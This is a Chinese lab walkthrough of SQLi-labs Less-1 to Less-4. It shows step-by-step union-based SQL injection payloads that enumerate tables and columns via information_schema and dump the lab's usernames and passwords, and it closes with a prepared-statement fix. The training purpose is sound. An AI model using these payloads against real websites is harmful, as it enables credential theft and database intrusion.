SQL-lab靶场less1-4

说明:部分内容来源于网络,如有侵权联系删除

前情提要:搭建sql-lab本地靶场的时候发现一些致命的报错:

这个程序只能在php 5.x上运行,在php 7及更高版本上,函数“mysql_query”和一些相关函数被删除,而不是“mysqli_query”。某些函数中的“MySQL”被替换为“MySQLi

其中一个原因就是旧版的靶场PHP环境是5.0版本的,而目前小皮面板更新到了8.0版本,配套的PHP环境是7.0。那么解决思路就两种,1:给sql-lab的PHP升级;2:小皮面板改成5.0版本的PHP环境。这里选择第一种解决方案

参考博客:

关于搭建SqliLabs中遇到的问题-CSDN博客

phpstudy v8.1在php7以上版本安装sqli-labs相关配置过程-CSDN博客

数据库结构简单小结:

mysql数据库5.0以上版本有一个自带的数据库叫做information_schema

该数据库下面有两个表一个是tables和columns

tables这个表的table_name字段下面是所有数据库存在的表名

table_schema字段下是所有表名对应的数据库名

columns这个表的colum_name字段下是所有数据库存在的字段名

columns_schema字段下是所有表名对应的数据库

常见语句记忆:

information_schema

表示所有信息,包括库、表、列

information_schema.tables

记录所有表名信息的表

information_schema.columns

记录所有列名信息的表

table_schema

数据库的名称

table_name

表名

column_name

列名

group_concat()

显示所有查询到的数据

Less-1 **Error Based- String** 基于字符串的报错注入

根据页面显示,提示我们搭配id传一个值

Please input the ID as parameter with numeric value

输入?id=1 回显

输入?id=2时,页面内容改变

说明这个网站应该会通过id参数进行数据库查询,也就是说id只是一个将1传入数据库的”媒介“,数据库真正需要处理的是1。

那么数据库能够处理的究竟是字符串1还是整数1,这是一个有待验证的问题。测试:?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

报错警告我们语法有问题

双引号不报错,那就是单引号的存在使原本SQL语句包裹id=1的单引号没有闭合,破坏了查询语句结构。还知道了一点:错误出现在第1行的末尾,即在“1”LIMIT 0,1'附近。相当于提示我们原有的SQL语句的组成,可以推测一下:

SELECT * FROM users WHERE () LIMIT 0,1;

WHERE子句:WHERE子句用于过滤记录,必须在其后面提供一个条件表达式。例如,WHERE id = 1。

LIMIT子句:LIMIT 1表示只返回结果集中的第一行数据。

使用注释符,测试:?id=1' --+ 。没有发生报错,正是因为注释了后面的LIMIT 0,1;

知道了基本注入方式,就可以通过其他操作符得到我想要的信息了

1,order by查询当前数据表有多少列 ?id=1 ' order by 1,2,3 --+

正常回显没有报错

2,增加猜测列数:?id=1 'order by 1,2,3,4 --+

Unknown column '4' in 'order clause'

发生报错,第4列不存在,但是第3列能正常回显,说明数据表有三列

接下来就需要判断回显点(回显点是指SQL查询结果显示在页面上的位置,有回显点的SQL注入叫做回显点注入。通过回显点,攻击者可以观察到SQL查询的结果,从而推断出数据库的结构和内容),而很明显该靶场存在两个回显点。那么还要分别表格哪一列在页面显示的

?id=-1'union select 1,2,3--+

  1. ?id=-1:这部分看起来像是试图将一个查询参数设置为 -1,这通常是SQL注入攻击中的一种常见技巧,用于绕过原始查询的条件。
  2. 'union select 1,2,3--+:这部分是典型的联合查询语法。union 关键字用于合并两个或多个 SELECT 语句的结果集。select 1,2,3 是一个简单的示例查询,它选择常数列 1, 2, 和 3

语句要求回显1,2,3列,结果回显了2,3。说明第二列和第三列的数据是回显点。

通过函数查询数据库名和版本号:

?id=-1'union select 1,database(),version()--+

通过group_concat()函数爆出表名

GROUP_CONCAT() 是 MySQL 中的一个聚合函数,用于将分组中的字符串值连接成一个单一的字符串

GROUP_CONCAT([DISTINCT] expr [ORDER BY {unsigned_integer | col_name | expr} [ASC | DESC] [, ...]] [SEPARATOR str_val])

  • DISTINCT:可选参数,用于去除结果中的重复值。
  • expr:要连接的列或表达式。
  • ORDER BY:可选参数,用于指定连接顺序。
  • SEPARATOR:可选参数,用于指定连接字符串之间的分隔符,默认为逗号 ,

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

  • group_concat(table_name) 将查询到的 information_schema.tables 表中的 table_name 字段的值进行连接。这里的 information_schema 是MySQL自带的信息数据库,其中的 tables 表存储了数据库的库名以及各个数据库中的表名
  • 整个语句将筛选出名为 security 的数据库中的所有表名

结果:emails,referers,uagents,users

爆破字段名:

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

  • information_schema.columns 表,这个表存储了数据库中各个表的列信息

爆破结果:CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

可以看到成功爆出来username,password字段

爆破出username,password的数据:

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码:SELECT * FROM users WHERE id='$id' LIMIT 0,1

Less-2 **Error Based- Intiger** 基于整数的报错注入

1,还是搭配id传一个值

由此确定页面正常回显的的标志,再判断整数还是字符串型注入:?id=1'

看到报错,再加双引号测试:?id=1"

仍然报错,说明原本的查询语句没有单双引号闭合,处理参数1数值类型是整数,是整数型注入

2,order by操作符判断数据表有几列:?id=1 order by 1,2,3 --+

?id=1 order by 1,2,3,4 --+

可以判断出该时间表有3列

3,接下来通过union判断回显点,?id=-1 union select 1,2,3 --+

由此得知回显点仅存在于查询的第2,3列上

4,使用操作符和函数爆出数据库名:

?id=-1 union select 1,2,database()--+

数据库名:security,group_concat()函数security所有数据表名:

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆出users数据表所有的列名:

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

最后就可以输出username,password信息了:

?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

YourLogin :name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码分析:SELECT * FROM users WHERE id=$id LIMIT 0,1

  • 构造了一个SQL查询语句SELECT * FROM users WHERE id=$id LIMIT 0,1;,用于从users表中根据id查询一条记录。
  • 使用mysqli_query执行查询,并将结果存储在$result中

查询语句和less1其实差不多,少了单引号对id的闭合包裹

WHERE id=-1: 这是一个条件子句,指定了只有当ID列的值等于-1时,对应的记录才会被选中。原数据表根本没有id=-1的序列,所以后续攻击语句都是?id=-1作为开头

SQL中的ID概念

在SQL(Structured Query Language)中,ID通常指的是数据库表中的一个特殊类型的列,用于唯一标识表中的每一行记录。这种列也被称为主键(Primary Key)。主键的主要目的是确保表中的每一行都可以被唯一地识别和访问。在设计数据库时,选择一个合适的ID字段对于数据的管理和检索至关重要3

ID的特性

ID字段通常具有以下特性:

  1. 唯一性:每个ID值必须是唯一的,以确保每行记录都能被准确无误地找到。
  2. 不可变性:一旦分配给某一行,ID值不应该改变,因为这可能会导致与其他依赖于该ID的数据库操作产生冲突。
  3. 顺序性:虽然不是必需的,但在某些情况下,ID值可能是按某种顺序(如递增)分配的,这有助于维护数据的时间顺序或逻辑顺序。

ID的常见用途

ID字段在数据库操作中有着广泛的应用,包括但不限于:

  • 关联数据:通过ID,可以在不同的表之间建立关系,实现数据的关联查询。例如,一个订单表可能有一个产品ID字段,用于关联到产品表中的具体产品记录。
  • 数据检索:可以通过ID快速定位和检索特定的记录。例如,SELECT * FROM users WHERE id = 1 这样的SQL语句可以用来获取ID为1的用户信息。
  • 更新和删除:ID也是更新或删除特定记录时的关键依据。例如,DELETE FROM users WHERE id = 1 可以用来删除ID为1的用户记录。

自动增长ID

在许多现代数据库系统中,支持为ID字段设置自动增长属性。这意味着每当新记录插入到表中时,数据库会自动为该记录分配一个新的、唯一的ID值。这通常通过数据库内部的计数器机制实现。例如,在MySQL中,可以使用AUTO_INCREMENT关键字来定义自动增长的ID字段6

Less-3 Error Based- String (with Twist)基于字符串的报错注入(转义)

1,第一步还是判断什么类型的注入:?id=1

能够正常回显,再测试:?id=1'  产生报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

再测试:?id=1" 能够正常回显。说明单引号会破坏查询语句原有单引号的闭合结构,可以断定这是一个字符型注入

2,order by判断当前数据表的列数:?id=1') order by 1,2,3--+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1,2,3-- ') LIMIT 0,1' at line 1

还是发生了报错,通过报错信息我们知道了真正的闭合方式是')。修改payload:

?id=1') order by 1,2,3--+ 正常回显

依次递归判断:?id=1') order by 1,2,3,4--+

报错说不存在第4列,那么数据表就只有3列

3,union操作符判断注入点:?id=-1') union select 1,2,3--+

回显还是2,3列

4,爆破数据库名:?id=-1') union select 1,2,database()--+

Your Password:security

配合group_concat()函数爆破出当前数据库所有数据表名:

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()--+

查看users数据表里面的所有列名:

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

最后再爆出用户名和密码:

?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

源码分析:SELECT * FROM users WHERE id=('$id') LIMIT 0,1

其实和less1的查询语句是一样的,只不过多了括号闭合

Less-4 Error Based- DoubleQuotes String

基于双引号的报错注入

1,id传一个值判断注入类型:?id=1'

正常回显页面,再拼接双引号传入一个值:?id=1"

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

发生报错,说明双引号会破坏原有查询语句的结构,由此判断注入类型是双引号,而参数又需要使用引号包裹,所以是字符串类型。还有一点,根据报错提示,推断正确的闭合方式应该是:("")

2,order by判断有该数据表有多少列,先猜测三列

?id=1") order by 1,2,3--+

回显是正常的,证明至少有三列,再判断是否有四列:?id=1") order by 1,2,3,4--+

发生报错,推断数据表只有3列

3,union判断回显点:?id=-1") union select 1,2,3--+

只会回显点是2,3列

4,爆破数据库名:?id=-1") union select 1,2,database()--+

爆破出数据表名:?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆破users表所有列名:?id=1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and

table_schema=database()--+

再爆破出所有的用户名和密码:?id=-1") union select 1,group_concat(username),group_concat(password) from users--+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

select * from user where id=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

select * from user where id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+

输出结果的区别

查询目的:这两个SQL查询的目的是利用SQL注入技术来获取数据库中users表的列名信息。

查询结构:两个查询都使用了UNION操作符来合并两个SELECT语句的结果集。第一个查询的条件是id=1,而第二个查询的条件是id=-1。

输出结果的区别

  1. 第一个查询 (id=1):
    • 如果user表中存在id=1的记录,那么查询会首先返回该记录。
    • 然后,UNION操作符会将第二个SELECT语句的结果(即从information_schema.columns 表中获取的列名信息)追加到结果集中。
    • 最终输出结果将包含user表中id=1的记录以及users表的列名信息。
  2. 第二个查询 (id=-1):
    • 由于user表中通常不会有id=-1的记录,第一个SELECT语句将不会返回任何记录。
    • 因此,UNION操作符的结果将仅包含第二个SELECT语句的结果,即users表的列名信息。
    • 最终输出结果将只包含users表的列名信息。

分析源码:

$id = '"' . $id . '"';

这行代码的作用是将 $id 变量的值用双引号包裹起来。例如,如果 $id 的值是 123,那么执行这行代码后,$id 的值将变为 "123"

"SELECT * FROM users WHERE id=($id) LIMIT 0,1";

本质上less1,2,3,4的查询语句是一样的,无非是对传入参数的闭合拼接方式不同

改进建议:

  1. 使用预处理语句: 为了防止SQL注入,建议使用预处理语句(Prepared Statements)。例如:
    $stmt = $pdo->prepare('SELECT * FROM users WHERE id = ? LIMIT 0,1');
    $stmt->execute([$id]);
  2. 简化字符串操作: 如果确实需要将 $id 用双引号包裹起来,可以考虑在SQL查询中直接使用双引号,而不是在PHP代码中进行字符串拼接。例如:
    $sql = "SELECT * FROM users WHERE id=\"$id\" LIMIT 0,1";

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/461809.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

AutoGLM:智谱AI的创新,让手机成为你的生活全能助手

目录 引言一、AutoGLM:开启AI的Phone Use时代二、技术核心:AI从“语言理解”到“执行操作”三、实际应用案例:AutoGLM的智能力量1. 智能生活管理🍎2. 社交网络的智能互动🍑3. 办公自动化🍒4. 电子商务的购物…

ceph补充介绍

SDS-ceph ceph介绍 crushmap 1、crush算法通过计算数据存储位置来确定如何存储和检索,授权客户端直接连接osd 2、对象通过算法被切分成数据片,分布在不同的osd上 3、提供很多种的bucket,最小的节点是osd # 结构 osd (or device) host #主…

Scrapy源码解析:DownloadHandlers设计与解析

1、源码解析 代码路径:scrapy/core/downloader/__init__.py 详细代码解析,请看代码注释 """Download handlers for different schemes"""import logging from typing import TYPE_CHECKING, Any, Callable, Dict, Gener…

如何解决docker镜像下载失败问题

经常用docker的朋友都知道,docker hub的镜像仓库经常访问不通 rootiZwz97kfjnf78copv1ae65Z:~# docker pull ubuntu:18.04 Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.…

探索 ONLYOFFICE:开源办公套件的魅力

文章目录 引言一、ONLYOFFICE 产品介绍与历史1.1 ONLUOFFICE 介绍1.2 ONLYOFFICE发展历史 二、ONLYOFFICE 的核心功能2.1 文档处理2.2 演示文稿 三、ONLYOFFICE 部署与安装四、ONLYOFFICE 产品优势和挑战五、ONLYOFFICE 案例分析六、ONLYOFFICE 的未来发展七、全文总结 引言 在…

FlaskFastAPIgunicornunicorn并发调用

Flask VS. FastAPI Flask和FastAPI是Python中两种流行的Web框架,它们各自具有不同的特点和适用场景。以下是它们之间的一些主要区别: 1. 框架类型 Flask:Flask是一个轻量级的微框架,适合构建小型到中型的Web应用。它灵活且易于扩展…

第2章 JSP基础

JavaWeb程序设计-T2(JSP基础) 一、JSP概述 1、JSP概念 JSP(Java Server Page)是sun公司倡导建立的一种动态网页标准。 用于开发动态网页(将后端开发语言嵌入带前端中【将java嵌入到HTML中】) 2、JSP工作原理 JSP就是将传统Java代码嵌入到html页面代码中,由Web服务器进…

Unix 中文件权限设置

在 Unix 和类 Unix 系统中,文件权限是通过八进制数表示的,这些数字代表不同的权限组合。以下是一些常见的八进制数及其对应的权限设置: 1. **0644**: - 所有者(owner):读(read&a…

【小白学机器学习28】 统计学脉络+ 总体+ 随机抽样方法

目录 参考书,学习书 0 统计学知识大致脉络 1 个体---抽样---整体 1.1 关于个体---抽样---整体,这个三段式关系 1.2 要明白,自然界的整体/母体是不可能被全部认识的 1.2.1 不要较真,如果是人为定义的一个整体,是可…

《Python游戏编程入门》注-第4章5

2.3 实现开始游戏的功能 当显示图1所示的游戏启动界面后,根据提示点击“确定”按键,则可以开始游戏。也就是要完成键盘监听的功能,当游戏程序监听到玩家点击了“确定”按键后,开始游戏。 在《Python游戏编程入门注-第4章2》中介…

mysql中的锁理解

1.共享锁,排他锁,也叫读锁和写锁 共享锁(S锁)(读锁):事务在读取记录的时候获取共享锁,允许其它事务同时获取共享锁。 排他锁(X锁)(写锁):事务在修改记录的时候获取排他锁,只允许一个事务获取排他锁&#x…

【C++】位图详解(一文彻底搞懂位图的使用方法与底层原理)

目录 1.位图的概念 2.位图的使用方法 定义与创建 设置和清除 位访问和检查 转换为其他格式 3.位图的使用场景 1.快速的查找某个数据是否在一个集合中 2.排序去重 3.求两个集合的交集和并集 4.位图的底层实现 私有成员定义与初始化 set和reset的实现 前面的博客我们…

补齐:相交链表:扣160

梦重新开始的地方 – 相交链表 给你两个单链表的头节点 headA 和 headB ,请你找出并返回两个单链表相交的起始节点。如果两个链表不存在相交节点,返回 null 。图示两个链表在节点 c1 开始相交: 示例: 何解? 暴力&…

Python:入门基础

目录 常量和表达式 变量 变量的语法 变量的类型 动态类型特性 注释的使用 输入和输出 通过控制台输出 通过控制台输入 运算符 算术运算符 关系运算符 逻辑运算符 赋值运算符 常量和表达式 print是Python中的一个内置函数,使用print函数可以将数据打印…

手动搭建koa+ts项目框架(node开发配置环境变量)

文章目录 一、安装所需依赖二、设置package.json三、定义ts (可选)四、配置环境变量文件五、引入变量文件总结如有启发,可点赞收藏哟~ 一、安装所需依赖 pnpm add dotenv二、设置package.json 先配置脚本设置对应环境变量NODE_ENV {"…

吞吐量最高飙升20倍!破解强化学习训练部署难题

**强化学习(RL)对大模型复杂推理能力提升有关键作用,然而,RL 复杂的计算流程以及现有系统局限性,也给训练和部署带来了挑战。近日,字节跳动豆包大模型团队与香港大学联合提出 HybridFlow(开源项…

Unity 插件编译版本.net 4.0

项目中用到了Google.ProtocolBuffersLite.dll 这个动态链接库,在升级完Unity版本后出现了 ”Unity targets .NET 4.x and is marked as compatible with editor, Editor can only use assemblies targeting .NET 3.5 or lower“ 的问题。 解决方法: 1、…

Cpp二叉搜索树的讲解与实现(21)

文章目录 前言一、二叉搜索树的概念定义特点 二、二叉树的实现基本框架查找插入删除当只有0 ~ 1个孩子的时候当有2个孩子的时候 三、二叉树的应用K模型KV模型 四、二叉树的性能分析总结 前言 这是全新的一个篇章呢,二叉搜索树是我们接下来学习set、map的前提 迈过它…

Elasticsearch —— ES 环境搭建、概念、基本操作、文档操作、SpringBoot继承ES

文章中会用到的文件,如果官网下不了可以在这下 链接: https://pan.baidu.com/s/1SeRdqLo0E0CmaVJdoZs_nQ?pwdxr76 提取码: xr76 一、 ES 环境搭建 注:环境搭建过程中的命令窗口不能关闭,关闭了服务就会关闭(除了修改设置后重启的…

第八届御网杯线下赛Pwn方向题解

由于最近比赛有点多,而且赶上招新,导致原本应该及时总结的比赛搁置了,总结来说还是得多练,因为时间很短像这种线下赛,一般只有几个小时,所以思路一定要清晰,我还是经验太少了,导致比…